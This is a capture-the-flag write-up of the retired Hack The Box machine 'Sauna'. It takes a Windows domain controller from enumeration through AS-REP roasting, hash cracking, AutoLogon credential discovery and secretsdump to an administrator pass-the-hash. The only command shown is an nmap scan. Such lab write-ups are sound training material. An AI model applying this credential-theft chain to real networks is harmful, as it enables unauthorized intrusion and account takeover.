HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform. Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Sauna, is retired. Let’s start with this machine.

The walkthrough

Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN. The “Sauna” machine IP is 10.10.10.175. We will adopt our usual methodology of performing penetration testing. Let’s start with enumeration in order to gain as much information about the machine as possible. As usual, let’s start with the nmap scan to gather more information around the services running on this machine. [CLICK IMAGES TO ENLARGE] «nmap -sC -sV -oA Sauna 10.10.10.175»

We start enumeration, and on port 80, the below site is deployed.

After enumerating the site, we can see that the team member names are displayed on a page.

Moving on with enumeration, since port 389 is also present in the nmap scan results, let’s use nmap ldap scripts to take a look at what we can enumerate.

At the end, we can see one names matches from the team member names. That is one “Hugo Smith.” Now, in order to enumerate further, we need to know the exact username of this user. Below are some of the username schema based on common names that I know of.

Using that list as an input to Impacket’s GetNPUsers, we got a valid assertion on hsmith, which indicates that the internal naming convention used by them is the first letter of first name followed by last name.

Following the same, build the appropriate list as shown below:

And then use it as an input to GetNTUsers again. We got a session of fsmith this time.

Below, we’re extracting that hash value and feeding it into hashcat. Hashcat was able to successfully decode the password.

Now let’s use evil-winrm to log in with these credentials. As we can see below, we were able to do so successfully.

Let’s grab the user.txt file. In order to escalate permissions further, let’s upload some known tools such as PowerUp.

Running PowerUp did not reveal anything useful other than a false positive on DLL injection.

Let’s use another tool, WinPeas, and check if it shows the same thing.

From WinPeas, we got the default artifacts (username and password) for WinLogon.

The reason why PowerUp did not show this is because it looks for key AutoAdminLogon to flag the default username and password, and that is not present here.

Moving forward with the new credentials, we can use SecretsDump from Impacket to grab other credentials and seems like we grab the administrator credentials.

Using evil-winrm again to log in with the discovered administrator hash and grab the root flag.

So, this was a good machine and the initial user enumeration holds the key to this box. After that, it was simple as using tools to escalate privileges further. We will continue this series with many more examples of interesting HTB machines.